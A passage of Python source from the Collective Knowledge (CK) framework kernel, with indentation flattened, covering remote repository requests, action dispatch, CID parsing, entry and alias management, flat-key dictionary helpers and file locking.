del(i['remote_server_pass'])
auth = urllib2.HTTPPasswordMgrWithDefaultRealm()
auth.add_password(None, url, au, ap)
add_auth=True
# Prepare handler (TBD: maybe there is another, more elegant way?)
if add_auth and add_ctx:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(auth), urllib2.HTTPSHandler(context=ctx)))
elif add_auth:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(auth)))
elif add_ctx:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPSHandler(context=ctx)))
# Prepare request
request = urllib2.Request(url, post)
# Connect
try:
f=urllib2.urlopen(request)
except Exception as e:
return {'return':1, 'error':'Access to remote CK repository failed ('+format(e)+')'}
# Read from Internet
try:
s=f.read()
f.close()
except Exception as e:
return {'return':1, 'error':'Failed reading stream from remote CK web service ('+format(e)+')'}
# Check output
try: s=s.decode('utf8')
except Exception as e: pass
if o=='con' and act!='pull':
out(s.rstrip())
else:
# Try to convert output to dictionary
r=convert_json_str_to_dict({'str':s, 'skip_quote_replacement':'yes'})
if r['return']>0:
return {'return':1, 'error':'can\'t parse output from remote CK server ('+r['error']+'):\n'+s[:256]+'\n\n...)'}
d=r['dict']
if 'return' in d: d['return']=int(d['return']) # Fix for some strange behavior when 'return' is not integer - should check why ...
if d.get('return',0)>0:
return d
# Post process if pull file ...
if act=='pull':
if o!='json' and o!='json_file':
# Convert encoded file to real file ...
x=d.get('file_content_base64','')
fn=d.get('filename','')
if fn=='': fn=cfg['default_archive_name']
r=convert_upload_string_to_file({'file_content_base64':x, 'filename':fn})
if r['return']>0: return r
if 'file_content_base64' in d: del(d['file_content_base64'])
rr.update(d)
# Restore original output
i['out']=o
return rr
##############################################################################
# Perform action (find module or use kernel)
#
# TARGET: CK kernel and low-level developers
def perform_action(i):
"""
Input: {
all parameters from function 'access'
(web) - if 'yes', called from the web
(common_func) - if 'yes', ignore search for modules
and call common func from the CK kernel
or
(kernel)
(local) - if 'yes', run locally even if remote repo ...
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
(out) - if action change output, return it
Output from the module/action
}
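
       Example (illustrative sketch; this function is normally reached
       indirectly via the public 'access' function):

         import ck.kernel as ck

         r=ck.perform_action({'action':'version', 'out':''})
         if r['return']==0: print(r.get('version_str',''))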
"""
# Check action
action=i.get('action','')
if action=='':
action='short_help'
elif action=='-?' or action=='-h' or action=='--help':
action='help'
# Check web
wb=i.get('web','')
# Substitute # in CIDs
cid=i.get('cid','')
cids=i.get('cids',[])
xout=i.get('out','')
ruoa=''
ruid=''
repo_module_uoa=i.get('repo_module_uoa','')
need_subst=False
rc={} # If CID from current directory
if cid.startswith(cfg['detect_cur_cid']) or cid.startswith(cfg['detect_cur_cid1']):
need_subst=True
else:
for c in cids:
if c.startswith(cfg['detect_cur_cid']) or c.startswith(cfg['detect_cur_cid1']):
need_subst=True
break
# If need to substitute #, attempt to detect current CID
if need_subst:
rc=detect_cid_in_current_path({})
if rc['return']>0: return rc
# Process cid (module or CID)
module_uoa=cid
if cid.find(':')>=0 or cid.startswith(cfg['detect_cur_cid']) or cid.startswith(cfg['detect_cur_cid1']):
# Means that CID
r=parse_cid({'cid':cid, 'cur_cid':rc})
if r['return']>0: return r
module_uoa=r.get('module_uoa','')
duoa=r.get('data_uoa','')
if duoa!='': i['data_uoa']=duoa
ruoa=r.get('repo_uoa','')
if ruoa!='': i['repo_uoa']=ruoa
# If module_uoa exists in input, set module_uoa
if i.get('module_uoa','')!='': module_uoa=i['module_uoa']
i['module_uoa']=module_uoa
# Check if repo exists and possibly remote!
remote=False
local=i.get('local','')
rs=i.get('remote_server_url','')
if rs=='':
ruoa=i.get('repo_uoa','')
if ruoa!='' and ruoa.find('*')<0 and ruoa.find('?')<0:
rq=load_repo_info_from_cache({'repo_uoa':ruoa})
if rq['return']>0: return rq
dd=rq.get('dict',{})
if dd.get('remote','')=='yes' and local!='yes':
rs=dd.get('url','')
if rs=='':
return {'return':1, 'error':'URL of remote repository is not defined'}
i['remote_server_url']=rs
if dd.get('remote_user','')!='':
i['remote_server_user']=dd['remote_user']
# It is completely unsafe - just for proof of concept ...
if dd.get('remote_password','')!='':
i['remote_server_pass']=dd['remote_password']
if dd.get('remote_skip_certificate_validation','')!='':
i['remote_skip_certificate_validation']=dd['remote_skip_certificate_validation']
if dd.get('remote_repo_uoa','')!='':
i['repo_uoa']=dd['remote_repo_uoa']
else:
del (i['repo_uoa'])
if i.get('remote_repo_uoa','')!='':
i['repo_uoa']=i['remote_repo_uoa']
del(i['remote_repo_uoa'])
if rs!='' and local!='yes':
return perform_remote_action(i)
# Process and parse cids -> xcids
xcids=[]
for c in cids:
r=parse_cid({'cid':c, 'cur_cid':rc, 'ignore_error':'yes'}) # here we ignore errors, since can be a file name, etc
if r['return']>0: return r
xcids.append(r)
i['xcids']=xcids
# Check if common function
cf=i.get('common_func','')
if cf=='': cf=i.get('common','') # making it easier to call it from the command line
# Check if no module_uoa, not common function, then try to get module from current
module_detected_from_dir=False
if not need_subst and cf!='yes' and module_uoa=='' and action not in cfg['common_actions']:
rc=detect_cid_in_current_path({})
if rc['return']==0:
module_uoa=rc.get('module_uoa','')
module_detected_from_dir=True
display_module_uoa = module_uoa
default_action_name = None
loaded_module = None
## If a specific module_uoa was given (not a wildcard) :
#
if cf!='yes' and module_uoa!='' and module_uoa.find('*')<0 and module_uoa.find('?')<0:
# Find module and load meta description
rx=load({'repo_uoa':repo_module_uoa,
'module_uoa':cfg['module_name'],
'data_uoa':module_uoa})
if rx['return']>0:
if cfg.get('download_missing_components','')!='yes':
return rx
# Check if search in remote server ...
restarted=False
if rx['return']==16:
xout2=''
if xout=='con': xout2=xout
# Try to download missing action/module
ry=download({'module_uoa':cfg['module_name'],
'data_uoa':module_uoa,
'out':xout2})
if ry['return']>0: return ry
# Attempt to load module again
rx=load({'module_uoa':cfg['module_name'],
'data_uoa':module_uoa})
if rx['return']>0: return rx
restarted=True
xout=''
if xout=='con':
out('')
if not restarted:
return rx
xmodule_uoa=rx['data_uoa']
xmodule_uid=rx['data_uid']
display_module_uoa = '"{}"'.format(xmodule_uoa)
if xmodule_uoa!=xmodule_uid:
display_module_uoa += ' ({})'.format(xmodule_uid)
# Check if allowed to run only from specific repos
if cfg.get('allow_run_only_from_allowed_repos','')=='yes':# and cf!='yes':
ruid=rx['repo_uid']
if ruid not in cfg.get('repo_uids_to_allow_run',[]):
return {'return':1, 'error':'executing commands is not allowed from this repository "'+ruid+'"'}
u=rx['dict']
p=rx['path']
# Check logging of repo:module:uoa to be able to rebuild CK dependencies
if log_ck_entries:
lce=cfg.get('log_ck_entries','')
if lce!='':
rl=save_text_file({'text_file':lce,
'string':'"action":"'+action+'", "repo_uoa":"'+
i.get('repo_uoa','')+'", "repo_module_uoa":"'+
repo_module_uoa+'", "module_uoa":"'+
xmodule_uoa+'", "module_uid":"'+
xmodule_uid+'", "data_uoa":"'+
i.get('data_uoa','')+'"\n',
'append':'yes'})
if rl['return']>0: return rl
declared_action = action in u.get('actions',{})
default_action_name = u.get('default_action_name','')
intercept_kernel = i.get('{}.intercept_kernel'.format(module_uoa),'')
if declared_action or default_action_name:
# Load module
mcn=u.get('module_name',cfg['module_code_name'])
if i.get('module_version','')!='':
mcnv=i['module_version'].strip()
if mcnv=='0':
mcnv=''
else:
mcnv=u.get('module_version','')
if mcnv!='':
mcn+='.'+mcnv
r=load_module_from_path({'path':p, 'module_code_name':mcn, 'cfg':u, 'data_uoa':rx['data_uoa']})
if r['return']>0: return r
loaded_module=r['code']
loaded_module.work['self_module_uid']=rx['data_uid']
loaded_module.work['self_module_uoa']=rx['data_uoa']
loaded_module.work['self_module_alias']=rx['data_alias']
loaded_module.work['path']=p
action1=u.get('actions_redirect',{}).get(action,'')
if action1=='': action1=action
if i.get('help','')=='yes' or i.get('api','')=='yes':
return get_api({'path':p, 'func':action1, 'out':xout})
if wb=='yes' and (xout=='con' or xout=='web') and u.get('actions',{}).get(action,{}).get('for_web','')!='yes':
return {'return':1, 'error':'this action is not supported in remote/web mode'}
if declared_action:
a=getattr(loaded_module, action1)
return a(i)
elif default_action_name and intercept_kernel:
a=getattr(loaded_module, default_action_name)
return a(i)
# otherwise fall through and try a "special" kernel method first
# Check if action == special keyword (add, delete, list, etc)
if (module_uoa!='' and action in cfg['common_actions']) or \
((module_uoa=='' or module_detected_from_dir) and action in cfg['actions']):
# Check function redirect - needed if action
# is the same as internal python keywords such as list
action1=cfg['actions_redirect'].get(action,'')
if action1=='': action1=action
if i.get('help','')=='yes' or i.get('api','')=='yes':
return get_api({'path':'', 'func':action1, 'out':xout})
if wb=='yes' and (xout=='con' or xout=='web') and cfg.get('actions',{}).get(action,{}).get('for_web','')!='yes':
return {'return':1, 'error':'this action is not supported in remote/web mode '}
a=getattr(sys.modules[__name__], action1)
return a(i)
if default_action_name:
a=getattr(loaded_module, default_action_name)
return a(i)
# Prepare error
if module_uoa=='':
er='in kernel'
else:
er='in module '+display_module_uoa
return {'return':1,'error':'action "'+action+'" not found '+er}
##############################################################################
# Print API from module for a given action
#
# TARGET: CK kernel and low-level developers
def get_api(i):
"""
Input: {
(path) - path to module, if comes from access function
or
(module_uoa) - if comes from CMD
(func) - func for API
(out) - output
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
title - title string
desc - original description
module - module name
api - api as string
line - line in found module
}
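
       Example (illustrative sketch; assumes the standard 'repo' module
       with an 'add' action is available):

         import ck.kernel as ck

         r=ck.get_api({'module_uoa':'repo', 'func':'add', 'out':''})
         if r['return']==0: print(r['api'])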
"""
p=i.get('path','')
f=i.get('func','')
o=i.get('out','')
muoa=i.get('module_uoa','')
t='' # last function description (if redirect to another API)
t_orig='' # original function description
l=0 # API line
a='' # accumulated API
if p=='' and muoa!='':
rx=load({'module_uoa':cfg['module_name'],
'data_uoa':muoa})
if rx['return']>0: return rx
p=rx['path']
if p=='':
p1=os.path.dirname(os.path.dirname(work['dir_default_repo']))
p=os.path.join(p1, cfg['file_kernel_py'])
if not os.path.isfile(p):
return {'return':1, 'error':'kernel not found in '+p}
else:
p=os.path.join(p, 'module.py')
if os.path.isfile(p):
rx=load_text_file({'text_file':p, 'split_to_list':'yes'})
if rx['return']>0: return rx
lst=rx['lst']
k=-1
while k<len(lst)-1:
k+=1
q=lst[k]
if q.find('def '+f+'(')>=0 or q.find('def '+f+' (')>=0 or \
q.find('def\t'+f+'(')>=0 or q.find('def\t'+f+' (')>=0:
j=k-1
if j>=0 and lst[j].strip()=='': j-=1
x='x'
while j>=0 and x!='' and not x.startswith('###'):
x=lst[j].strip()
if x!='' and not x.startswith('###'):
if x=='#': x=' '
elif x.startswith('# '): x=x[2:]
t=x+'\n'+t
j-=1
if t!='':
l=j+2
if t_orig=='': t_orig=t
# Find starting point of an API
j=k+1
if j<len(lst) and lst[j].find('"""')>=0:
j+=1
# Check if redirect to another function
restart=False
if j<len(lst):
x=lst[j].strip()
if x.lower().startswith("see"):
z1=x.find('"')
if z1>0:
z2=x.find('"',z1+1)
if z2>0:
f=x[z1+1:z2] # new function name
k=-1
restart=True # restart search for new function
if not restart:
x=''
while x.find('"""')<0 and j<len(lst):
x=lst[j]
if x.find('"""')<0:
a+=x+'\n'
j+=1
if t=='' and a=='':
return {'return':1, 'error':'function not found'}
dd=t_orig.strip()
if o=='con':
out('Description: '+dd)
out('')
out('Module: '+p)
out('')
out('Line: '+str(l))
out('')
out('API:')
out(a)
elif o=='web':
out('<B>Function:</B> '+t+'<BR>')
out('<BR>')
out('<B>Module:</B> '+p+'<BR>')
out('<BR>')
out('<B>API:</B><BR>')
out('<pre>')
out(a)
out('</pre><BR>')
return {'return':0, 'title':t, 'desc':dd, 'module':p, 'api':a, 'line':l}
##############################################################################
# Convert CID to dict and add missing parts in CID from the current path if needed
#
# TARGET: CK kernel and low-level developers
def parse_cid(i):
"""
Input: {
cid - in format (REPO_UOA:)MODULE_UOA:DATA_UOA
(cur_cid) - output of function 'detect_cid_in_current_path'
(ignore_error) - if 'yes', ignore wrong format
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
data_uoa - data UOA
module_uoa - module UOA
(repo_uoa) - repo UOA
}
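
       Example (illustrative sketch; the CID below is hypothetical):

         import ck.kernel as ck

         r=ck.parse_cid({'cid':'my-repo:module:my-entry'})
         # r -> {'return':0, 'repo_uoa':'my-repo',
         #       'module_uoa':'module', 'data_uoa':'my-entry'}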
"""
r={'return':0}
c=i['cid'].strip()
ie=i.get('ignore_error','')
cc=i.get('cur_cid', {})
a0=cc.get('repo_uoa','')
m0=cc.get('module_uoa','')
d0=cc.get('data_uoa','')
if c.startswith(cfg['detect_cur_cid']) or c.startswith(cfg['detect_cur_cid1']):
c=c[1:]
x=c.split(':')
if len(x)<2 and m0=='':
if ie!='yes':
return {'return':1, 'error':'unknown CID format'}
else:
return r
if c=='':
r['repo_uoa']=a0
r['module_uoa']=m0
r['data_uoa']=d0
elif len(x)==1:
if a0!='': r['repo_uoa']=a0
r['module_uoa']=m0
r['data_uoa']=x[0]
elif len(x)==2:
if a0!='': r['repo_uoa']=a0
r['module_uoa']=x[0]
r['data_uoa']=x[1]
elif len(x)==3:
r['repo_uoa']=x[0]
r['module_uoa']=x[1]
r['data_uoa']=x[2]
else:
if ie!='yes':
return {'return':1, 'error':'unknown CID format'}
return r
##############################################################################
# Create an UOA entry in a given path
#
# TARGET: CK kernel and low-level developers
def create_entry(i):
"""
Input: {
path - path where to create an entry
(split_dirs) - (int) number of first characters to split directory into subdirectories
to be able to handle many entries (similar to MediaWiki)
(data_uoa) - data UOA
(data_uid) - if uoa is an alias, we can force data UID
(force) - if 'yes', force creation even if directory already exists
(allow_multiple_aliases) - if 'yes', allow multiple aliases for the same UID
(needed for cKnowledge.io to publish
renamed components with the same UID)
}
Output: {
return - return code = 0, if successful
16, if data entry already exists
> 0, if error
(error) - error text if return > 0
path - path to data entry
data_uid - data UID (from UOA)
data_alias - data alias (from UOA)
data_uoa - data alias or data uid if data alias==''
}
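
       Example (illustrative sketch; the target path and alias are hypothetical):

         import ck.kernel as ck

         r=ck.create_entry({'path':'/home/user/CK/my-repo/module',
                            'data_uoa':'my-entry'})
         if r['return']==16: print('entry already exists')
         elif r['return']==0: print(r['path'])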
"""
p0=i.get('path','')
d=i.get('data_uoa','')
di=i.get('data_uid','')
ama=(i.get('allow_multiple_aliases','')=='yes') # Experimental functionality for cKnowledge.io
split_dirs=safe_int(i.get('split_dirs',0),0)
xforce=i.get('force','')
if xforce=='yes':
force=True
else:
force=False
# If no uoa, generate UID
alias=''
uid=''
if d=='':
if di=='':
r=gen_uid({})
if r['return']>0: return r
uid=r['data_uid']
else:
uid=di
# Check if already exists
iii={'path':p0, 'data_uoa':uid}
if split_dirs!=0:
iii['split_dirs']=split_dirs
r=find_path_to_entry(iii)
if r['return']>0 and r['return']!=16: return r
elif r['return']==0:
r['return']=16
return r
alias=''
else:
# Check if already exists
if not force:
# Check if already exists
iii={'path':p0, 'data_uoa':d}
if split_dirs!=0:
iii['split_dirs']=split_dirs
r=find_path_to_entry(iii)
if r['return']>0 and r['return']!=16: return r
elif r['return']==0:
r['return']=16
return r
if is_uid(d):
uid=d
alias=''
else:
alias=d
if di!='':
uid=i['data_uid']
else:
r=gen_uid({})
if r['return']>0: return r
uid=r['data_uid']
# Entry directory name: alias if it exists, otherwise UID
dir_name=uid if alias=='' else alias
# Check split
p00=p0
sd1,sd2=split_name(dir_name, split_dirs)
if sd2!='': # otherwise name is smaller than the split number
p00=os.path.join(p0,sd1)
# Create first split if doesn't exist
if not os.path.isdir(p00):
os.mkdir(p00)
# Finalize path to entry
p=os.path.join(p00, dir_name)
# Check alias disambiguation
if alias!='':
p1=os.path.join(p0, cfg['subdir_ck_ext'])
if not os.path.isdir(p1):
# Create .cm directory
try: # pragma: no cover
os.mkdir(p1)
except Exception as e:
return {'return':1, 'error':format(e)}
# Check if alias->uid exist
p3=os.path.join(p1, cfg['file_alias_a'] + alias)
if os.path.isfile(p3): # pragma: no cover
try:
fx=open(p3)
uid1=fx.readline().strip()
fx.close()
except Exception as e:
pass
if uid1!=uid:
return {'return':1, 'error':'different alias->uid disambiguator already exists in '+p3}
# Check if uid->alias exist
xalias=alias
p2=os.path.join(p1, cfg['file_alias_u'] + uid)
if os.path.isfile(p2): # pragma: no cover
alias1=''
alias1s=[]
try:
fx=open(p2)
alias1=fx.read().strip()
alias1s=alias1.split('\n')
fx.close()
except Exception as e:
pass
if alias not in alias1s:
if ama:
xalias=alias+'\n'+alias1
else:
return {'return':1, 'error':'different uid->alias disambiguator already exists in '+p2}
ru=save_text_file({'text_file':p3, 'string':uid+'\n'})
if ru['return']>0: return ru
ru=save_text_file({'text_file':p2, 'string':xalias+'\n'})
if ru['return']>0: return ru
# Create directory
if not os.path.exists(p):
try:
os.mkdir(p)
except Exception as e:
return {'return':1, 'error':format(e)}
uoa=uid
if alias!='': uoa=alias
return {'return':0, 'path':p, 'data_uid':uid, 'data_alias':alias, 'data_uoa':uoa}
##############################################################################
# Delete entry alias from path
#
# TARGET: CK kernel and low-level developers
def delete_alias(i):
"""
Input: {
path - path to the entry
data_uid - data UID
(data_alias) - data alias
(repo_dict) - repo cfg if available to check sync
(share) - if 'yes', try to rm via GIT
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
rd=i.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
if i.get('share','')=='yes': rshared='git'
p=i['path']
alias=i.get('data_alias','')
uid=''
if alias!='' and os.path.isdir(p):
p0=os.path.join(p, cfg['subdir_ck_ext'])
p9=cfg['file_alias_a'] + alias
p1=os.path.join(p0, p9)
if rshared!='':
ppp=os.getcwd()
os.chdir(p0)
if os.path.isfile(p1):
try:
f=open(p1)
uid=f.readline().strip()
f.close()
except Exception as e:
pass
if rshared!='':
ss=cfg['repo_types'][rshared]['rm'].replace('$#files#$', p9)
rx=os.system(ss)
if os.path.isfile(p1): os.remove(p1)
if uid=='': uid=i['data_uid']
if uid!='':
p9=cfg['file_alias_u'] + uid
p1=os.path.join(p0, p9)
if os.path.isfile(p1):
# Check if multiple aliases
delete=True
alias1=''
alias1s=[]
try:
fx=open(p1)
alias1=fx.read().strip()
alias1s=alias1.split('\n')
fx.close()
except Exception as e:
pass
if len(alias1s)>1:
delete=False
alias1s.remove(alias)
xalias='\n'.join(alias1s)
# Update alias disambiguator
ru=save_text_file({'text_file':p1, 'string':xalias})
if ru['return']>0: return ru
if delete:
if rshared!='':
ss=cfg['repo_types'][rshared]['rm'].replace('$#files#$', p9)
rx=os.system(ss)
if os.path.isfile(p1):
os.remove(p1)
if rshared!='':
os.chdir(ppp)
return {'return':0}
##############################################################################
# Delete a given directory with subdirectories (be careful)
#
# TARGET: CK kernel and low-level developers
def delete_directory(i):
"""
Input: {
path - path to delete
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import shutil
p=i['path']
if os.path.isdir(p):
shutil.rmtree(p, onerror=rm_read_only)
return {'return':0}
##############################################################################
# Convert dictionary into CK flat format
#
# TARGET: end users
def flatten_dict(i):
"""
Any list item is converted to @number=value
Any dict item is converted to #key=value
# is always added at the beginning
Input: {
dict - python dictionary
(prefix) - prefix (for recursion)
(prune_keys) - list of keys to prune (can have wildcards)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - flattened dictionary
}
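
       Example (illustrative; follows the key rules above):

         import ck.kernel as ck

         r=ck.flatten_dict({'dict':{'a':{'b':[1,2]}, 'c':3}})
         # r['dict'] -> {'##a#b@0':1, '##a#b@1':2, '##c':3}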
"""
prefix='#'
if i.get('prefix','')!='': prefix=str(i['prefix'])
a=i['dict']
aa={}
pk=i.get('prune_keys','')
if pk=='': pk=[]
flatten_dict_internal(a, aa, prefix, pk)
return {'return':0, 'dict': aa}
##############################################################################
# Convert dictionary into CK flat format (internal, used for recursion)
#
# TARGET: internal use
def flatten_dict_internal(a, aa, prefix, pk):
# Start flattening
if type(a) is dict or type(a) is list:
i=0
for x in a:
if type(a) is dict:
v=a[x]
prefix1=prefix+'#'+str(x)
else:
prefix1=prefix+'@'+str(i)
v=x
if type(v) is dict or type(v) is list:
flatten_dict_internal(v, aa, prefix1, pk)
else:
if flatten_dict_internal_check_key(prefix1, pk):
aa[prefix1]=v
i+=1
else:
if flatten_dict_internal_check_key(prefix, pk):
aa[prefix]=a
return {'return':0, 'dict': a}
##############################################################################
# Check whether a flat key should be kept given the prune list (internal, used for recursion)
#
# TARGET: internal use
def flatten_dict_internal_check_key(prefix, pk):
import fnmatch
add=False
if len(pk)==0:
add=True
else:
for c in pk:
if '*' in c or '?' in c:
if fnmatch.fnmatch(prefix,c):
add=True
break
else:
if prefix==c:
add=True
break
return add
##############################################################################
# Get value from dict by flat key
#
# TARGET: end users
def get_by_flat_key(i):
"""
Input: {
dict - dictionary
key - flat key
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
value - value or None, if the key doesn't exist
}
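
       Example (illustrative; uses a key produced by 'flatten_dict'):

         import ck.kernel as ck

         r=ck.get_by_flat_key({'dict':{'a':{'b':[1,2]}}, 'key':'##a#b@1'})
         # r['value'] -> 2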
"""
# Check vars
v=None
a=i['dict']
k=i['key']
# Remove leading # if exists
if len(k)>0 and k[0:1]=='#': k=k[1:]
k1=''
kt='' # type '#' or '@'
x=0
finish=False
while not finish:
y=k[x]
x+=1
if y=='#' or y=='@':
if kt=='#':
if k1 not in a: break
a=a[k1]
elif kt=='@':
if len(a)<=type_long(k1): break
a=a[type_long(k1)]
k1=''
kt=y
else:
k1+=y
if x>=len(k): break
if k1!='' and kt!='':
if kt=='#':
if k1 in a: v=a[k1]
else:
if len(a)>type_long(k1): v=a[type_long(k1)]
return {'return':0, 'value': v}
##############################################################################
# Set value in array using flattened key
#
# TARGET: end users
def set_by_flat_key(i):
"""
Input: {
dict - dict (it will be directly changed!)
key - flat key (treated as a plain key if it doesn't start with #)
value - value to set
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - modified dict
}
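
       Example (illustrative; note that the input dict is modified in place):

         import ck.kernel as ck

         d={}
         r=ck.set_by_flat_key({'dict':d, 'key':'##a#b', 'value':1})
         # d -> {'a':{'b':1}}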
"""
a=i['dict']
k=i['key']
v=i['value']
# Remove leading # if there
if len(k)>0 and k[0:1]=='#': k=k[1:]
k1=''
kt='' # type '#' or '@'
x=0
finish=False
while not finish:
y=k[x]
x+=1
if y=='#' or y=='@':
if kt=='#':
if k1 not in a:
if y=='#': a[k1]={}
else: a[k1]=[]
a=a[k1]
elif kt=='@':
if len(a)<=type_long(k1):
for q in range(len(a)-1,type_long(k1)):
if y=='#': a.append({})
else: a.append([])
a=a[type_long(k1)]
k1=''
kt=y
else:
k1+=y
if x>=len(k): break
if k1!='' and kt!='':
if kt=='#':
a[k1]=v
else:
if len(a)<=type_long(k1):
for q in range(len(a)-1,type_long(k1)):
if y=='#': a.append({})
else: a.append([])
a[type_long(k1)]=v
return {'return':0, 'dict': i['dict']}
##############################################################################
# Restore flattened dict
#
# TARGET: end users
def restore_flattened_dict(i):
"""
Input: {
dict - flattened dict
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - restored dict
}
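
       Example (illustrative; inverse of 'flatten_dict'):

         import ck.kernel as ck

         r=ck.restore_flattened_dict({'dict':{'##a#b@0':1, '##a#b@1':2}})
         # r['dict'] -> {'a':{'b':[1,2]}}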
"""
# Check vars
a={} # default
b=i['dict']
first=True
for x in b:
if first:
first=False
y=x[1:2]
if y=='@': a=[]
else: a={}
set_by_flat_key({'dict':a, 'key':x, 'value':b[x]})
return {'return':0, 'dict': a}
##############################################################################
# Set lock for path
#
# TARGET: CK kernel and low-level developers
def set_lock(i):
"""
Input: {
path - path to be locked
(get_lock) - if 'yes', lock this entry
(lock_retries)     - number of retries to acquire lock (default=11)
(lock_retry_delay) - delay in seconds before trying to acquire lock again (default=3)
(lock_expire_time) - number of seconds before lock expires (default=30)
(unlock_uid) - UID of the lock to release it
}
Output: {
return - return code = 0, if successful
= 32, couldn't acquire lock (still locked after all retries)
> 0, if error
(error) - error text if return > 0
(lock_uid) - lock UID, if locked successfully
}
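
       Example (illustrative sketch; the entry path is hypothetical):

         import ck.kernel as ck

         r=ck.set_lock({'path':'/home/user/CK/my-repo/module/my-entry',
                        'get_lock':'yes'})
         if r['return']==0:
             uid=r['lock_uid']
             # ... work with the entry, then release the lock:
             ck.set_lock({'path':'/home/user/CK/my-repo/module/my-entry',
                          'unlock_uid':uid})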
"""
p=i['path']
gl=i.get('get_lock','')
uuid=i.get('unlock_uid','')
exp=float(i.get('lock_expire_time','30'))
rr={'return':0}
if gl=='yes' or uuid!='':
pl=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_for_lock'])
luid=''
if os.path.isfile(pl):
import time
# Read lock file
try:
f=open(pl)
luid=f.readline().strip()
exp=float(f.readline().strip())
if exp<0: exp=1
f.close()
except Exception as e:
return {'return':1, 'error':'problem reading lock file'}
# Check if lock has expired
if gl=='yes' and uuid=='':
# Retry if locked
retry=int(i.get('lock_retries','11'))
retryd=float(i.get('lock_retry_delay','3'))
dt=os.path.getmtime(pl)+exp-time.time()
if dt>0:
while retry>0 and os.path.isfile(pl) and dt>0:
retry-=1
time.sleep(retryd)
if os.path.isfile(pl):
dt=os.path.getmtime(pl)+exp-time.time()
if retry==0 and dt>0 and os.path.isfile(pl):
return {'return':32, 'error':'entry is still locked'}
luid=''
if os.path.isfile(pl): os.remove(pl)
# Release lock if requested (and if not locked by another UID)
if luid!='' and uuid!='':
if luid!=uuid:
return {'return':32, 'error': 'entry is locked with another UID'}
luid=''
os.remove(pl)
# Finish acquiring lock
if gl=='yes':
# (Re)acquire lock
if uuid=='':
r=gen_uid({})
if r['return']>0: return r
luid=r['data_uid']
else:
luid=uuid
# Write lock file
try:
f=open(pl,'w')
f.write(luid+'\n')
f.write(str(exp)+'\n')
f.close()
except Exception as e:
return {'return':1, 'error':'problem writing lock file'}
rr['lock_uid']=luid
return rr
##############################################################################
# Check if locked and unlock if needed
#
# TARGET: CK kernel and low-level developers
def check_lock(i):
"""
Input: {
path - path to be locked
(unlock_uid) - UID of the lock to release it
}
Output: {
return - return code = 0, if successful
= 32, lock UID is not matching
> 0, if error
(error) - error text if return > 0
}
"""
p=i['path']
uuid=i.get('unlock_uid','')
pl=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_for_lock'])
luid=''
if os.path.isfile(pl):
import time
# Read lock file
try:
f=open(pl)
luid=f.readline().strip()
exp=float(f.readline().strip())
if exp<0: exp=1
f.close()
except Exception as e:
return {'return':1, 'error':'problem reading lock file'}
# Check if lock has expired
dt=os.path.getmtime(pl)+exp-time.time()
if dt<0:
# Expired
if uuid=='' or uuid==luid:
os.remove(pl)
else:
return {'return':32, 'error':'entry lock UID is not matching'}
else:
if uuid=='':
return {'return':32, 'error':'entry is locked'}
elif uuid!=luid:
return {'return':32, 'error':'entry is locked with different UID'}
elif uuid!='':
return {'return':32, 'error':'lock was removed or expired'}
return {'return':0}
##############################################################################
# Get current date and time
#
# TARGET: end users
def get_current_date_time(i):
"""
Input: {}
Output: {
return - return code = 0
array - array with date and time
iso_datetime - date and time in ISO format
}
"""
import datetime
a={}
now1=datetime.datetime.now()
now=now1.timetuple()
a['date_year']=now[0]
a['date_month']=now[1]
a['date_day']=now[2]
a['time_hour']=now[3]
a['time_minute']=now[4]
a['time_second']=now[5]
return {'return':0, 'array':a, 'iso_datetime':now1.isoformat()}
##############################################################################
# Detect CID of the current directory (repository entry)
#
# TARGET: CK kernel and low-level developers
def detect_cid_in_current_path(i):
"""
Input: {
(path) - path, otherwise current directory
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
(module_uoa) - module UOA
(module_uid) - module UID
(module_alias) - module alias
(data_uoa) - data UOA
(data_uid) - data UID
(data_alias) - data alias
}
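
       Example (illustrative sketch; the result depends on the current directory):

         import ck.kernel as ck

         r=ck.detect_cid_in_current_path({})
         if r['return']==0:
             print(r.get('module_uoa','')+':'+r.get('data_uoa',''))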
"""
p=i.get('path','')
if p=='': p=os.getcwd()
p=os.path.normpath(p)
dirs=[]
p1=''
pr='*'
found=False
while pr!='':
p1=os.path.join(p, cfg['repo_file'])
if os.path.isfile(p1):
found=True
break
p2=os.path.split(p)
p=p2[0]
pr=p2[1]
dirs.append(pr)
if not found:
return {'return':16, 'error':'repository is not detected in the current path'}
# Find info about repo (prepared as return dict)
r=find_repo_by_path({'path':p})
if r['return']>0: return r
repo_dict=r.get('repo_dict',{})
# Check info about module
ld=len(dirs)
if ld>0:
m=dirs[ld-1]
split_dirs=0
rx=find_path_to_entry({'path':p, 'data_uoa':m})
if rx['return']>0 and rx['return']!=16: return rx
elif rx['return']==0:
r['module_uoa']=rx['data_uoa']
r['module_uid']=rx['data_uid']
r['module_alias']=rx['data_alias']
muid=rx['data_uid']
muoa=rx['data_uoa']
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(repo_dict, muid, muoa)
# Check info about data
if ld>1:
d=dirs[ld-2]
iii={}
if split_dirs!=0:
d=dirs[ld-3]
iii['split_dirs']=split_dirs
iii['path']=os.path.join(p,m)
iii['data_uoa']=d
rx=find_path_to_entry(iii)
if rx['return']>0 and rx['return']!=16: return rx
elif rx['return']==0:
r['data_uoa']=rx['data_uoa']
r['data_uid']=rx['data_uid']
r['data_alias']=rx['data_alias']
return r
# **************************************************************************
